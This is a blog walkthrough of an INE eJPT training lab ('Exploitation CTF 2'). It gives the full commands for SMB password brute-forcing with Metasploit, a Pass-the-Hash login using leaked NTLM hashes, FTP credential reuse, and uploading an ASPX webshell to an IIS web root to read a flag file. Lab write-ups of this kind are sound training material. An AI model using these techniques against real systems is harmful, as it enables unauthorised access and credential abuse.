A walkthrough covering SMB brute-forcing, Pass-the-Hash attacks, FTP credential reuse, and ASPX webshell upload to capture all four flags.
Press enter or click to view image in full size
Hello everyone!
In this blog, I’ll walk through Exploitation CTF 2 from INE’s eJPT path. One Windows target, four flags — and if you read the questions carefully, each one actually unlocks the answer for the next. The lab is designed as a chain, and once you spot that pattern it flows naturally from start to finish.
So, let’s dive in.
Q. Looks like SMB user tom has not changed his password from a very long time.
As usual, I started with an Nmap scan and opened Metasploit in parallel:
nmap -T4 -sV -O -sC target.ine.local
service postgresql start && msfconsole -q -x "workspace -a win"Press enter or click to view image in full size
The scan revealed several open ports — FTP on 21, HTTP on 80, SMB on 445, and RDP on 3389. The question was pointing directly at SMB and a user called tom with a weak password, so I loaded the smb_login auxiliary module and brute-forced it against the provided wordlist:
use auxiliary/scanner/smb/smb_login
set rhosts target.ine.local
set smbuser tom
set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
runPress enter or click to view image in full size
Got it. With valid credentials, I listed the available SMB shares using smbmap:
smbmap -H target.ine.local -u tom -p <password>Press enter or click to view image in full size
Tom had read access to HRDocuments. I connected and listed the contents:
smbclient //target.ine.local/HRDocuments -U tom --password <password>
smb: \> lsPress enter or click to view image in full size
Two files — flag1.txt and leaked-hashes.txt. Flag 1 captured, and the hashes file was clearly the hint for the next question.
Q. Using the NTLM hash list discovered in the previous challenge, can you compromise the SMB user nancy?
The leaked hashes file contained multiple NTLM hashes. The question pointed at user nancy, so instead of cracking the hashes I went straight to a Pass-the-Hash attack — using the hashes directly against SMB:
use auxiliary/scanner/smb/smb_login
set rhosts target.ine.local
set smbuser nancy
set pass_file leaked-hashes.txt
runPress enter or click to view image in full size
One hash matched. For SMB authentication the format is <LM_HASH>:<NT_HASH> — only the NT portion matters. I used it to connect directly with --pw-nt-hash:
smbclient //target.ine.local/ITResources -U nancy --pw-nt-hash <NT_hash>
smb: \> lsPress enter or click to view image in full size
Two files inside — flag2.txt and hint.txt. Flag 2 captured. I grabbed the hint file:
smb: \> get hint.txtQ. I wonder what the hint found in the previous challenge could be useful for!
I opened the hint file:
cat hint.txtIt contained a set of credentials for a user called david. The Nmap scan had shown FTP open on port 21, so I tried them there:
ftp ftp://david:<password>@target.ine.localPress enter or click to view image in full size
Logged in. Listing the FTP directory showed flag3.txt sitting right there alongside the default IIS files. Flag 3 captured.
Q. Can you compromise the target machine and retrieve the C:\flag4.txt file?
Still in the FTP session — and the FTP root appeared to be the IIS web root (same iisstart.htm and iis-85.png from the default IIS page). That meant anything uploaded via FTP would be accessible directly from the web server.
Get Suraj Apar’s stories in your inbox
Join Medium for free to get updates from this writer.
I uploaded an ASPX webshell:
ftp> put /usr/share/webshells/aspx/cmdasp.aspx cmd.aspxPress enter or click to view image in full size
Then opened it in the browser:
http://target.ine.local/cmd.aspxThe webshell gave me a command input field. I ran:
type C:\flag4.txtPress enter or click to view image in full size
Flag 4 returned directly in the browser.
Final Thoughts
This CTF was well designed — each flag handed you exactly what you needed for the next one. Tom’s weak password gave the NTLM hashes. The hashes gave nancy’s access. Nancy’s share gave david’s credentials. David’s FTP session gave webshell upload, and the webshell gave the final flag.
The Pass-the-Hash step was the most interesting technically. You never need to crack an NTLM hash to use it — Windows authentication accepts the hash directly, which means a leaked hash file is often as good as a plaintext password list.
Thanks for reading!